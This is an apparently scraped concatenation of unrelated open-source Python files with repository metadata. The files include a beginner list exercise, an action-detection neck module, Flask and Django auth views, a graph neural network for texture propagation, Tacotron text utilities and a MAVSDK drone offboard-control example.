print(neighborhoods) #PRINTS ['krog', 'westside', 'o4w']
#LOOPING THROUGH LISTS of LISTS
atlanta=['atv', 'lenox', 'phipps']
,['piedmont', 'pride', 'vortex']
,['ormsbys', 'marcel', 'terminal']
idx_1=0
for wtd in atlanta:
idx_2 =0
print("%s. %s" % ((idx_1+1),group))
"""
#-----------------------------------------------------------------------------------------------------------------------
""" Create a program that prints the ingredients of your 3 favorite foods.
The ingredients must be in a list inside of the foods list
Before each food print "Food # X has the following ingredients". Where X is the index of the food.
(Challange) You can only use the for in operation.
(Extra Challenge) Make it a quiz game of guess the food based on its ingredients. Add more food items if needed. """
# Exercise: print each favorite food followed by its ingredient list.
# Each entry is [name, ingredient, ingredient, ...].
fav_food=[['Cheesecake','Cheese','Milk','Eggs'],['Cheesesticks','Bread','Mozzerella','Marinara'],['Mochi','Rice Flour', 'Ice Cream','Matcha']]
# Unpack the three sub-lists into named variables (unused below — kept for illustration).
[cheesecake,cheese_sticks,mochi]=fav_food
for food in fav_food:
    print('%s has the following ingredients:\n%s' % (food[0],food[1:])) ##PRINTS: Cheesecake has the following ingredients:
                                                                        #          ['Cheese', 'Milk', 'Eggs'] etc...
# Second variant: ingredient-only lists, numbered "Food #X" headers.
fav_food=[['Cheese','Milk','Eggs'],
        ['Bread','Mozzerella','Marinara'],
        ['Rice Flour', 'Ice Cream','Matcha']]
idx=0
for food in fav_food:
    print("Food #%d has the following ingredients: " % (idx + 1)) #idx IS AN INDEX(base) NUMBER
    # NOTE(review): fav_food[idx] is the same list as `food`; iterating `food`
    # directly (or using enumerate) would be equivalent.
    for i in fav_food[idx]: #
        print("   %s" % i)
    idx+=1
|
[
"rashad.collins22@gmail.com"
] |
rashad.collins22@gmail.com
|
76330de0a4c96a0b15569777959c84585de7152f
|
a5a76c9fc62917fd125b2b8c1e1a05abf50cd3f6
|
/models/necks/basic.py
|
49a67c24acf51c69c50332af61f221fc5018fe6b
|
[
"Apache-2.0"
] |
permissive
|
CV-IP/ACAR-Net
|
cf8b1f4ce088a076fb85ed94dbe189c205a9f9a5
|
d684203eabda68b882c0b959b69e44a7bab1f247
|
refs/heads/master
| 2023-08-18T19:39:20.211051
| 2021-10-08T09:20:14
| 2021-10-08T09:20:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,368
|
py
|
import torch
import torch.nn as nn
from .utils import bbox_jitter, get_bbox_after_aug
__all__ = ['basic']
class BasicNeck(nn.Module):
    """Neck module that turns per-clip labels/boxes into ROI tensors and targets.

    Applies optional bbox jittering during training, drops boxes whose preserved
    area ratio after crop augmentation falls below ``aug_threshold``, and builds
    one-hot (multi-class) or index (single-class) targets.
    """

    def __init__(self, aug_threshold=0., bbox_jitter=None, num_classes=60, multi_class=True):
        super(BasicNeck, self).__init__()
        # threshold on preserved ratio of bboxes after cropping augmentation
        self.aug_threshold = aug_threshold
        # config for bbox jittering
        # NOTE(review): accessed as .get(...) and .scale in forward — presumably an
        # attribute-dict style config object; confirm against the config loader.
        self.bbox_jitter = bbox_jitter
        self.num_classes = num_classes
        self.multi_class = multi_class

    # data: aug_info, labels, filenames, mid_times
    # returns: num_rois, rois, roi_ids, targets, sizes_before_padding, filenames, mid_times, bboxes, bbox_ids
    def forward(self, data):
        rois, roi_ids, targets, sizes_before_padding, filenames, mid_times = [], [0], [], [], [], []
        bboxes, bbox_ids = [], []  # used for multi-crop fusion
        cur_bbox_id = -1  # record current bbox no.
        for idx in range(len(data['aug_info'])):
            aug_info = data['aug_info'][idx]
            pad_ratio = aug_info['pad_ratio']
            sizes_before_padding.append([1. / pad_ratio[0], 1. / pad_ratio[1]])
            for label in data['labels'][idx]:
                cur_bbox_id += 1
                if self.training and self.bbox_jitter is not None:
                    # `bbox_jitter` here is the module-level helper, not self.bbox_jitter.
                    bbox_list = bbox_jitter(label['bounding_box'],
                                            self.bbox_jitter.get('num', 1),
                                            self.bbox_jitter.scale)
                else:
                    # no bbox jittering during evaluation
                    bbox_list = [label['bounding_box']]

                for b in bbox_list:
                    bbox = get_bbox_after_aug(aug_info, b, self.aug_threshold)
                    if bbox is None:
                        # box mostly cropped away by augmentation — skip it
                        continue
                    rois.append([idx] + bbox)

                    filenames.append(data['filenames'][idx])
                    mid_times.append(data['mid_times'][idx])
                    bboxes.append(label['bounding_box'])
                    bbox_ids.append(cur_bbox_id)

                    if self.multi_class:
                        # one-hot vector over num_classes
                        ret = torch.zeros(self.num_classes)
                        ret.put_(torch.LongTensor(label['label']),
                                 torch.ones(len(label['label'])))
                    else:
                        ret = torch.LongTensor(label['label'])
                    targets.append(ret)

            # roi_ids[i+1] marks where clip i's ROIs end (prefix offsets).
            roi_ids.append(len(rois))

        num_rois = len(rois)
        if num_rois == 0:
            # nothing survived augmentation: signal the caller with empty tensors
            return {'num_rois': 0, 'rois': None, 'roi_ids': roi_ids, 'targets': None,
                    'sizes_before_padding': sizes_before_padding,
                    'filenames': filenames, 'mid_times': mid_times, 'bboxes': bboxes, 'bbox_ids': bbox_ids}

        rois = torch.FloatTensor(rois).cuda()
        targets = torch.stack(targets, dim=0).cuda()
        return {'num_rois': num_rois, 'rois': rois, 'roi_ids': roi_ids, 'targets': targets,
                'sizes_before_padding': sizes_before_padding,
                'filenames': filenames, 'mid_times': mid_times, 'bboxes': bboxes, 'bbox_ids': bbox_ids}
'filenames': filenames, 'mid_times': mid_times, 'bboxes': bboxes, 'bbox_ids': bbox_ids}
def basic(**kwargs):
    """Factory helper: build a :class:`BasicNeck` from the given config kwargs."""
    return BasicNeck(**kwargs)
|
[
"siyuchen@pku.edu.cn"
] |
siyuchen@pku.edu.cn
|
181b41fd843958312207675173b1998d69b55da7
|
e2efe41ab152c58dc0c1786f0859e6c6b6c4dafd
|
/info/modules/profile/__init__.py
|
548a39d31bbd8861fda7850b893730da729123ad
|
[] |
no_license
|
lyancode/information_test
|
5c8010a87078c43b22c86c73bd27a7326eaa60ca
|
463a08b3d78d12cb0b5aef12ee9d9f884ec187bd
|
refs/heads/master
| 2020-04-01T06:56:32.718491
| 2018-10-24T02:42:12
| 2018-10-24T02:42:12
| 152,970,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
# All login/registration related business logic lives in this module.
from flask import Blueprint

# Create the blueprint object; routes under it are prefixed with /user.
profile_blue = Blueprint("profile", __name__, url_prefix="/user")

# Imported after the blueprint is defined — presumably to avoid a circular
# import, since views registers routes on profile_blue; verify.
from . import views
|
[
"liyan__mail@163.com"
] |
liyan__mail@163.com
|
27f9922179f74d0548db5048709e1cebd75eb668
|
2b99ae73409249692f45cc0175e52848cd048263
|
/code/src/plan2scene/texture_prop/tp_models/simple_gated_gnn.py
|
b38d90e869cb901a5628e659ee345888cdf29287
|
[
"MIT"
] |
permissive
|
ViLahte/plan2scene
|
dc3521ec6262947e0ed1e8c15f8e2db77fc1c095
|
b1310e7885dd74bd93a7f93ff4dacdb25ae704e4
|
refs/heads/main
| 2023-06-15T15:30:13.226011
| 2021-07-01T20:29:15
| 2021-07-01T20:29:15
| 377,935,065
| 0
| 0
|
MIT
| 2021-06-17T19:05:07
| 2021-06-17T19:05:07
| null |
UTF-8
|
Python
| false
| false
| 3,472
|
py
|
import torch
import torch.nn.functional as F
from torch import nn
from torch_geometric.data import Batch
from torch_geometric.nn import SAGEConv, GatedGraphConv
from plan2scene.config_manager import ConfigManager
def generate_extended_linear(count: int):
    """
    Returns a helper method which generates a sequential network of linear layers.
    :param count: Length of the chain
    :return: Method that can generate a chain of linear layers.
    """
    def generate_linear(input_dim: int, body_dim: int, output_dim: int):
        """
        Generates a sequential network of linear layers, having the specified input dim, hidden layer dim and output dim.
        :param input_dim: Input dimensions of the chain
        :param body_dim: Hidden layer dimensions of the chain
        :param output_dim: Output dimensions of the chain
        :return: Sequential network of linear layers.
        """
        modules = []
        for idx in range(count):
            # ReLU between consecutive linear layers (never before the first).
            if idx:
                modules.append(nn.ReLU())
            fan_in = input_dim if idx == 0 else body_dim
            fan_out = output_dim if idx == count - 1 else body_dim
            modules.append(nn.Linear(fan_in, fan_out))
        return nn.Sequential(*modules)

    return generate_linear
class SimpleGatedGNN(torch.nn.Module):
    """
    Neural network used for texture propagation.
    """
    def __init__(self, conf: ConfigManager, gated_layer_count: int, linear_count: int = 1, linear_layer_multiplier: int = 1):
        """
        Initialize network.
        :param conf: Config manager
        :param gated_layer_count: Number of layers of the gated graph convolution operator from https://arxiv.org/abs/1511.05493.
        :param linear_count: Number of linear layers at the front and back of the GNN.
        :param linear_layer_multiplier: Multiplier on width of linear layers.
        """
        super(SimpleGatedGNN, self).__init__()
        self.conf = conf
        linear_layer = generate_extended_linear(linear_count)
        # Input projection: node embedding -> widened hidden dim.
        self.linear1 = linear_layer(conf.texture_prop.node_embedding_dim,
                                    conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
                                    conf.texture_prop.node_embedding_dim * linear_layer_multiplier)
        # Message passing over the room graph.
        self.conv1 = GatedGraphConv(out_channels=conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
                                    num_layers=gated_layer_count)
        # Output projection: hidden dim -> per-node target dim.
        self.linear2 = linear_layer(conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
                                    conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
                                    conf.texture_prop.node_target_dim)

    def forward(self, data: Batch) -> torch.Tensor:
        """
        Forward pass. Returns a tensor of embeddings. Each entry of the batch represent texture embeddings predicted for a room.
        :param data: Batch of input data.
        :return: tensor [batch_size, surface_count, embedding dim]
        """
        # NOTE(review): bs here is the total node count of the batch graph, and the
        # final view assumes node_target_dim == len(surfaces) * combined_emb_dim —
        # confirm against the config.
        bs, _ = data.x.shape
        x, edge_index = data.x, data.edge_index
        x = self.linear1(x)
        x = F.relu(x)
        x = self.conv1(x, edge_index)
        x = F.relu(x)
        x = self.linear2(x)
        return x.view(bs, len(self.conf.surfaces), self.conf.texture_gen.combined_emb_dim)
|
[
"mvidanap@sfu.ca"
] |
mvidanap@sfu.ca
|
e5a704d957c0c637f67a74b1e84a70c337b2c631
|
09445fa6d9a8ffbe8af93b2054d1c0d6ef541b9a
|
/accounts/views.py
|
1dc237fc076e193d682c2fcae85d0024fe4ace4c
|
[] |
no_license
|
besssli/CSX2018DjangoTest
|
e610bd86cd980399cad2aa13689d7ef8ac165f0f
|
d951c73eb3bdf1a41c9363de57e2a27020818226
|
refs/heads/master
| 2020-03-29T09:05:51.938765
| 2018-11-09T01:32:38
| 2018-11-09T01:32:38
| 149,741,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import login, logout
# Create your views here.
def signup_view(request):
    """Register a new user; on success, log them in and redirect to the article list."""
    if request.method != 'POST':
        # Plain GET: show an empty registration form.
        return render(request, 'accounts/signup.html', {'form': UserCreationForm()})
    form = UserCreationForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so validation errors are shown.
        return render(request, 'accounts/signup.html', {'form': form})
    user = form.save()
    # log the user in
    login(request, user)
    return redirect('articles:list')
def login_view(request):
    """Authenticate a user; honors an optional 'next' redirect target."""
    if request.method != 'POST':
        # Plain GET: show an empty login form.
        return render(request, 'accounts/login.html', {'form': AuthenticationForm()})
    form = AuthenticationForm(data=request.POST)
    if form.is_valid():
        # log in the user
        login(request, form.get_user())
        if 'next' in request.POST:
            return redirect(request.POST['next'])
        return redirect('articles:list')
    # Invalid credentials: re-render with the bound form and its errors.
    return render(request, 'accounts/login.html', {'form': form})
def logout_view(request):
    """Log the user out on POST; always redirect back to the article list.

    Bug fix: the original returned None for non-POST requests, which is invalid
    for a Django view (views must return an HttpResponse) and produced a 500.
    Non-POST requests now redirect without logging out.
    """
    if request.method == 'POST':
        logout(request)
    return redirect('articles:list')
|
[
"32564690+besssli@users.noreply.github.com"
] |
32564690+besssli@users.noreply.github.com
|
97d64b5f37844028007a1cfea36d95e2507f501c
|
e212d9b85df5962c8ebf9e737b825fa3fe89f3d6
|
/WaveRNN/utility/text/__init__.py
|
0b9d8cc2401057deb5c8f63699658b5395afb09c
|
[
"MIT"
] |
permissive
|
sankar-mukherjee/Expressive-Speech-Synthesis-Research
|
9c3ea564509324dbfe033a328edd45aa7bffeffa
|
d85a067a131c04944f5bbe7fa7ab8c26e7d83800
|
refs/heads/master
| 2023-01-28T05:01:17.371683
| 2020-12-16T11:43:15
| 2020-12-16T11:43:15
| 294,351,192
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
""" from https://github.com/keithito/tacotron """
import re
from utility.text import cleaners
from utility.text.symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}

# Regular expression matching text enclosed in curly braces:
# group(1) = text before the braces, group(2) = brace contents (ARPAbet), group(3) = remainder.
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
  '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.

    The text can optionally have ARPAbet sequences enclosed in curly braces embedded
    in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."

    Args:
      text: string to convert to a sequence
      cleaner_names: names of the cleaner functions to run the text through

    Returns:
      List of integers corresponding to the symbols in the text
  '''
  sequence = []

  # Peel off text/{ARPAbet} segments from the front until nothing remains.
  remaining = text
  while remaining:
    match = _curly_re.match(remaining)
    if match is None:
      # No more curly-brace sections: clean and encode the rest in one go.
      sequence.extend(_symbols_to_sequence(_clean_text(remaining, cleaner_names)))
      break
    sequence.extend(_symbols_to_sequence(_clean_text(match.group(1), cleaner_names)))
    sequence.extend(_arpabet_to_sequence(match.group(2)))
    remaining = match.group(3)
  return sequence
def sequence_to_text(sequence):
  '''Converts a sequence of IDs back to a string'''
  pieces = []
  for symbol_id in sequence:
    if symbol_id not in _id_to_symbol:
      # Unknown IDs are silently skipped.
      continue
    sym = _id_to_symbol[symbol_id]
    # Enclose ARPAbet back in curly braces:
    if len(sym) > 1 and sym[0] == '@':
      sym = '{%s}' % sym[1:]
    pieces.append(sym)
  # Adjacent ARPAbet sections were space-separated in the input.
  return ''.join(pieces).replace('}{', ' ')
def _clean_text(text, cleaner_names):
  """Run *text* through each named cleaner from the cleaners module, in order."""
  for cleaner_name in cleaner_names:
    fn = getattr(cleaners, cleaner_name)
    if not fn:
      raise Exception('Unknown cleaner: %s' % cleaner_name)
    text = fn(text)
  return text
def _symbols_to_sequence(symbols):
  # Encode each known, non-padding/EOS symbol to its numeric ID.
  return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
  # ARPAbet symbols are stored in the symbol table with an '@' prefix.
  return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
  """True for symbols that have an ID and are not '_' or '~'.

  Bug fix: the original used ``s is not '_'`` — identity comparison against a
  string literal, which relies on CPython interning, is not guaranteed to work,
  and raises a SyntaxWarning on modern Python. Use inequality instead.
  """
  return s in _symbol_to_id and s != '_' and s != '~'
|
[
"sankar1535@gmail.com"
] |
sankar1535@gmail.com
|
a23cc982e760acbf55a579b0d8829327af32289b
|
e9a33230671bd7e099c11943ec056f84b6a9e24b
|
/jaal_call.py
|
b2ae8e2a72ebbbaeda09cb9d5df50b979976757a
|
[
"MIT"
] |
permissive
|
Olshansk/jaal
|
52c49dcaaa1d4be21d1474c7739f4e5af9eb971a
|
2b1e4696ca0d3d8f074827e5ae2943817eaa88e7
|
refs/heads/main
| 2023-05-31T13:45:57.443046
| 2021-05-23T09:42:57
| 2021-05-23T09:42:57
| 340,232,097
| 1
| 0
|
MIT
| 2021-02-19T02:04:16
| 2021-02-19T02:04:16
| null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# import
from jaal import Jaal
from jaal.datasets import load_got

# load the bundled Game of Thrones sample data (edge list + node list)
edge_df, node_df = load_got()

# define vis options passed through to the underlying vis.js network
vis_opts = {'height': '600px',  # change height
            'interaction':{'hover': True},  # turn on-off the hover
            'physics':{'stabilization':{'iterations': 100}}}  # define the convergence iteration of network

# init Jaal and run server (with opts)
Jaal(edge_df, node_df).plot(vis_opts=vis_opts)

# init Jaal and run server (with default options)
# Jaal(edge_df, node_df).plot()
|
[
"mohitmayank1@gmail.com"
] |
mohitmayank1@gmail.com
|
cc60ef58e4a055c25e2d8445b6458c78dbffbca6
|
c171c9a15a782635477a95693349e6d76531ca84
|
/maps/utils.py
|
a132652e6f3ecd51e5b68923c5b5c812025c0a94
|
[] |
no_license
|
xiaoyali97/CS61A
|
5a9d1e9f57135ab576d5c6599d327c305db4fb17
|
f8dffa388b04ca535e8d43f3e5342d356a58a246
|
refs/heads/master
| 2020-03-18T10:52:05.434470
| 2018-05-24T00:05:55
| 2018-05-24T00:05:55
| 134,637,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
"""Utilities for Maps"""
from math import sqrt
from random import sample
# Rename the built-in zip (http://docs.python.org/3/library/functions.html#zip)
_zip = zip
def map_and_filter(s, map_fn, filter_fn):
    """Returns a new list containing the results of calling map_fn on each
    element of sequence s for which filter_fn returns a true value.

    >>> square = lambda x: x * x
    >>> is_odd = lambda x: x % 2 == 1
    >>> map_and_filter([1, 2, 3, 4, 5], square, is_odd)
    [1, 9, 25]
    """
    # BEGIN Question 0
    out = []
    for elem in s:
        if filter_fn(elem):
            out.append(map_fn(elem))
    return out
    # END Question 0
def key_of_min_value(d):
    """Returns the key in a dict d that corresponds to the minimum value of d.

    >>> letters = {'a': 6, 'b': 5, 'c': 4, 'd': 5}
    >>> min(letters)
    'a'
    >>> key_of_min_value(letters)
    'c'
    """
    # BEGIN Question 0
    # Fix: the original recomputed min(d.values()) once per key, making this
    # O(n^2). A single min() over the keys, keyed by their values, is O(n) and
    # returns the same first-in-iteration-order key on ties.
    return min(d, key=d.get)
    # END Question 0
def zip(*sequences):
    """Returns a list of lists, where the i-th list contains the i-th
    element from each of the argument sequences.

    >>> zip(range(0, 3), range(3, 6))
    [[0, 3], [1, 4], [2, 5]]
    >>> for a, b in zip([1, 2, 3], [4, 5, 6]):
    ...     print(a, b)
    1 4
    2 5
    3 6
    >>> for triple in zip(['a', 'b', 'c'], [1, 2, 3], ['do', 're', 'mi']):
    ...     print(triple)
    ['a', 1, 'do']
    ['b', 2, 're']
    ['c', 3, 'mi']
    """
    # _zip is the shadowed builtin; each tuple becomes a list.
    return [list(group) for group in _zip(*sequences)]
def enumerate(s, start=0):
    """Returns a list of lists, where the i-th list contains i+start and
    the i-th element of s.

    >>> enumerate([6, 1, 'a'])
    [[0, 6], [1, 1], [2, 'a']]
    >>> enumerate('five', 5)
    [[5, 'f'], [6, 'i'], [7, 'v'], [8, 'e']]
    """
    # BEGIN Question 0
    # (builtin enumerate is shadowed by this function, so index manually)
    return [[start + i, s[i]] for i in range(len(s))]
    # END Question 0
def distance(pos1, pos2):
    """Returns the Euclidean distance between pos1 and pos2, which are pairs.

    >>> distance([1, 2], [4, 6])
    5.0
    """
    dx = pos1[0] - pos2[0]
    dy = pos1[1] - pos2[1]
    return sqrt(dx * dx + dy * dy)
def mean(s):
    """Returns the arithmetic mean of a sequence of numbers s.

    >>> mean([-1, 3])
    1.0
    >>> mean([0, -3, 2, -1])
    -0.5
    """
    # BEGIN Question 1
    count = len(s)
    assert count != 0
    return sum(s) / count
    # END Question 1
|
[
"lixiaoyachina@hotmail.com"
] |
lixiaoyachina@hotmail.com
|
ee763c76f0898b4f6f1fde32c910a76b592f04fa
|
1e5f62eab69973af4ae8641c69bf730232b84549
|
/src/test/debug/test
|
fd48f22c770f4aaf53e89e94021b48ae56f5b628
|
[
"MIT"
] |
permissive
|
sbrichardson/aphros
|
c85e37d052df07f4f9971244c49f3713ffac77a5
|
3f93f4aa83c8ad36cb2f9ed9bd522f4a019829b0
|
refs/heads/master
| 2023-03-09T22:53:51.830606
| 2021-02-25T22:49:07
| 2021-02-25T22:49:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
#!/usr/bin/env python3

import aphros


class Test(aphros.TestBase):
    # Runs the debug binary, pipes its output through ./strippath to normalize
    # paths, and reports the generated file for comparison by the harness.
    def run(self):
        self.runcmd("./t.debug | ./strippath > out")
        return ["out"]


Test().main()
|
[
"kpetr@ethz.ch"
] |
kpetr@ethz.ch
|
|
1f1529473302b02d543365662b5ea486c153d200
|
0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af
|
/ToLeftandRight.py
|
b17d2c4f0c6445bb843c71a099e74b7f273f481e
|
[] |
no_license
|
EngrDevDom/Everyday-Coding-in-Python
|
61b0e4fcbc6c7f399587deab2fa55763c9d519b5
|
93329ad485a25e7c6afa81d7229147044344736c
|
refs/heads/master
| 2023-02-25T05:04:50.051111
| 2021-01-30T02:43:40
| 2021-01-30T02:43:40
| 274,971,215
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
# ToLeftandRight.py
# Reads integers one per line and prints them as a "staircase": each stored
# number is indented one step right of the previous if larger, one step left if
# smaller. Input stops when the indentation returns to column 0.
nums = []
num_of_space = 0
current_num = int(input("Enter a number: "))
nums.append(current_num)  # first value stored as int; printed at column 0
while True:
    num = int(input("Enter a number: "))
    if num > current_num: num_of_space += 1
    elif num == current_num: continue  # repeats are skipped entirely (not stored)
    else: num_of_space -= 1
    current_num = num
    nums.append(" " * num_of_space + str(num))
    # NOTE(review): a value smaller than the first drives num_of_space negative;
    # " " * negative is "" — confirm that is intended.
    if num_of_space == 0: break  # back at the left margin -> stop reading
for num in nums: print(num)
|
[
"60880034+EngrDevDom@users.noreply.github.com"
] |
60880034+EngrDevDom@users.noreply.github.com
|
3cc3eff0e75bc844fb12fcaa253b0afbd4c3e476
|
1a6d5f58a5aaf478e3af1a880f155a2bcbd06aff
|
/PX4/MAVSDK-Python/offboard_velocity_body.py
|
d14407e6d1504bb49547099d1e336c087e9f2eaa
|
[
"MIT"
] |
permissive
|
yingshaoxo/suicide-squad
|
5b8858376bffe9d80e66debbd75e83b6fb6f5b6e
|
cadbd0d48e860a8747b59190fc67a5a114c3462b
|
refs/heads/master
| 2020-11-24T02:46:38.604339
| 2019-10-29T05:47:44
| 2019-10-29T05:47:44
| 227,932,669
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,055
|
py
|
#!/usr/bin/env python3
"""
Some caveats when attempting to run the examples in non-gps environments:
- `drone.action.arm()` will return a `COMMAND_DENIED` result because the action requires switching
to LOITER mode first, something that is currently not supported in a non-gps environment. You will
need to temporarily disable this part here:
`https://github.com/mavlink/MAVSDK/blob/develop/plugins/action/action_impl.cpp#L61-L65`
- `drone.offboard.stop()` will also return a `COMMAND_DENIED` result because it requires a mode
switch to HOLD, something that is currently not supported in a non-gps environment.
"""
import asyncio
from mavsdk import System
from mavsdk import (OffboardError, VelocityBodyYawspeed)
async def run():
    """ Does Offboard control using velocity body coordinates. """
    drone = System()
    await drone.connect(system_address="udp://:14540")

    # Set parameters
    await drone.param.set_float_param("MIS_TAKEOFF_ALT", 1.0)  # set takeoff height to 1 meter
    await drone.param.set_int_param("COM_TAKEOFF_ACT", 0)  # hold after takeoff
    await drone.param.set_int_param("COM_OBL_ACT", 0)  # 0: land if lost offboard signal; 1: hold if lost offboard signal

    # Start parallel tasks: altitude printer runs alongside the flight sequence.
    asyncio.ensure_future(print_altitude(drone))

    print("-- Arming")
    await drone.action.arm()

    # An initial setpoint must be streamed before offboard mode can start.
    print("-- Setting initial setpoint")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 0.0))

    print("-- Starting offboard")
    try:
        await drone.offboard.start()
    except OffboardError as error:
        print(f"Starting offboard mode failed with error code: {error._result.result}")
        print("-- Disarming")
        await drone.action.disarm()
        return

    # NOTE(review): the printed labels below don't all match the commanded
    # velocities (e.g. "Turn clock-wise and climb" sends only a climb) — confirm.
    print("-- Turn clock-wise and climb")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, -1, 0.0))
    await asyncio.sleep(5)

    print("-- Turn clock-wise and climb")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.1, 0.0, 0.0))
    await asyncio.sleep(5)

    print("-- Wait for a bit")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, -0.1, 0.0, 0.0))
    await asyncio.sleep(5)

    print("-- Wait for a bit")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 2.0))
    await asyncio.sleep(20)

    print("-- Stopping offboard")
    try:
        await drone.offboard.stop()
    except OffboardError as error:
        print(f"Stopping offboard mode failed with error code: {error._result.result}")

    print("-- Landing")
    await drone.action.land()
async def print_altitude(drone):
    """ Prints the altitude when it changes """
    previous_altitude = None

    # Telemetry stream: only print when the rounded altitude actually changes.
    async for position in drone.telemetry.position():
        altitude = round(position.relative_altitude_m)
        if altitude != previous_altitude:
            previous_altitude = altitude
            print(f"Altitude: {altitude}")
if __name__ == "__main__":
    # NOTE(review): get_event_loop() + run_until_complete is the pre-3.10
    # pattern; asyncio.run(run()) is the modern equivalent.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(run())
|
[
"yingshaoxo@gmail.com"
] |
yingshaoxo@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.